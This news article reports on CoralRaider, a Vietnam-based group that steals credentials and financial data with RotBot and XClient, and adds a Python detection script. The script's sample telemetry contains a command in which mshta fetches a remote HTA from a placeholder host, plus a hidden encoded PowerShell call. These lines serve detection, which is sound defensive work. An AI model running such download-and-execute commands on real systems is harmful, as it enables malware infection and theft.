Hackers in Vietnam Use Malware to Steal Financial Information All Over Asia including India.

Vietnam: Since at least May 2023, a threat actor believed to be based in Vietnam has been observed using malware to target people in several Asian and Southeast Asian countries. The malware is built to steal valuable data.

Cisco Talos is tracking the group, which it calls CoralRaider and assesses to be financially motivated. India, China, South Korea, Bangladesh, Pakistan, Indonesia, and Vietnam are among the countries the campaign targets.

Security researchers Chetan Raghuprasad and Joey Chen said, “This group’s main goal is to steal people’s login information, financial information, and social media accounts, such as business and advertising accounts.” “They employ RotBot, a customized variant of Quasar RAT, and XClient stealer as payloads.”

The group also uses commodity malware such as AsyncRAT, NetSupport RAT, and Rhadamanthys, a mix of remote access trojans and information stealers.

Hackers based in Vietnam have mainly been going after business and advertising accounts. They have used stealer malware families such as Ducktail, NodeStealer, and VietCredCare to take over the accounts and monetize them.

The plan is to use Telegram to exfiltrate the stolen data from compromised computers. This data is then sold on underground markets for illicit profit.

“CoralRaider users have headquarters in Vietnam, based on the actor posts in their Telegram C2 bot channels and language preference in naming their bots, PDB strings, and other Vietnamese words hard-coded in their payload binaries,” they said.

A Windows shortcut file (LNK) is the first step in the attack chain, but it is not yet clear how these files are delivered to their targets.

When the LNK file is opened, an HTML Application (HTA) file is downloaded and run from a download server controlled by the attacker. This launches a Visual Basic script embedded in the HTA file.

The script then decrypts and runs three further PowerShell scripts in sequence. These scripts perform anti-VM and anti-analysis checks, bypass Windows User Account Control (UAC), suppress Windows and application notifications, and download and run RotBot.

RotBot is set up to talk to a Telegram bot, get the XClient stealer malware, and run it in memory. This makes it easier to steal cookies, credentials, and financial data from web browsers like Brave, CốcCốc, Google Chrome, Microsoft Edge, Mozilla Firefox, and Opera, as well as data from Discord and Telegram and screenshots.
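The stages described above leave a recognizable trail in process-creation telemetry: mshta.exe fetching an HTA from a remote server, followed by PowerShell descended from that script host. The following detection logic is an added example written for this article, not code from Cisco Talos or the malware; the event records are constructed sample data, and the field names (pid, ppid, image, cmdline) are assumptions about how Sysmon-style process events have been normalized before export.

```python
"""Flag the LNK -> HTA -> VBScript -> PowerShell chain in process telemetry.

Added example, not part of the original article or Cisco Talos' reporting.
Field names are assumed; the records below are constructed sample data.
"""
import re

# Constructed telemetry: explorer opens a shortcut, mshta pulls a remote HTA,
# the embedded VBScript spawns PowerShell; pids 400 and 500 are benign noise.
EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe https://download.example.invalid/stage1.hta"},
    {"pid": 300, "ppid": 200,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc QQBBAEEA"},
    {"pid": 400, "ppid": 100, "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe notes.txt"},
    {"pid": 500, "ppid": 1, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe C:\Program Files\Vendor\help.hta"},  # local HTA
]

REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def ancestors(pid, by_pid):
    """Yield image basenames of every known ancestor of pid, nearest first."""
    seen = set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        pid = by_pid[pid]["ppid"]
        if pid in by_pid:
            yield basename(by_pid[pid]["image"])


def detect(events):
    """Return (pid, rule) pairs for events matching the HTA/PowerShell stages."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        name = basename(e["image"])
        # Stage 2: mshta loading an HTA from a remote download server.
        if name == "mshta.exe" and REMOTE_URL.search(e["cmdline"]):
            findings.append((e["pid"], "mshta_remote_hta"))
        # Stage 3: PowerShell whose ancestry includes a script host (HTA/VBScript).
        if name == "powershell.exe" and SCRIPT_HOSTS & set(ancestors(e["pid"], by_pid)):
            findings.append((e["pid"], "powershell_from_script_host"))
    return findings


if __name__ == "__main__":
    for pid, rule in detect(EVENTS):
        print(f"pid {pid}: {rule}")
```

The local-HTA case (pid 500) is deliberately left unflagged, since legitimate help files use mshta.exe; pairing the remote-URL condition with parent-child lineage is what keeps the rule from drowning in false positives.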

XClient is also designed to steal information from victims’ Facebook, Instagram, TikTok, and YouTube accounts. It does this by harvesting their payment methods and the permissions configured for their Facebook business and ads accounts.

“RotBot is a variant of the Quasar RAT client that the threat actor customized and compiled for this campaign,” they said. “[XClient] has vast information-stealing power through its plugin module and various modules to carry out remote administrative tasks.”

Bitdefender recently shared details of a malvertising campaign on Facebook that exploits interest in generative AI tools to distribute a number of information stealers, including Rilide, Vidar, IceRAT, and a newcomer called Nova Stealer.

The threat actor starts the attack by taking over an existing Facebook account and changing it to look like well-known AI tools from Google, OpenAI, and Midjourney. They then run paid ads on Facebook to reach more people.

One of these fake pages, which impersonated Midjourney, had 1.2 million followers before it was taken down on March 8, 2023. The page’s administrators were located mostly in Vietnam, the US, Indonesia, the UK, Australia, and elsewhere.

“The malvertising campaigns have tremendous reach through Meta’s sponsored ad system and have constantly been targeting European users from Germany, Poland, Italy, France, Belgium, Spain, the Netherlands, Romania, Sweden, and elsewhere,” the Romanian cybersecurity firm said.

About The Author:

Yogesh Naager is a content marketer who specializes in the cybersecurity and B2B space. Besides writing for the News4Hackers blog, he has also written for brands including CollegeDunia, Utsav Fashion, and NASSCOM. Naager entered the content field in an unusual way: he began his career as an insurance sales executive, where he developed an interest in simplifying difficult concepts. He combines this interest with a love of narrative, which makes him an effective writer in the cybersecurity field. He also frequently writes for Craw Security.
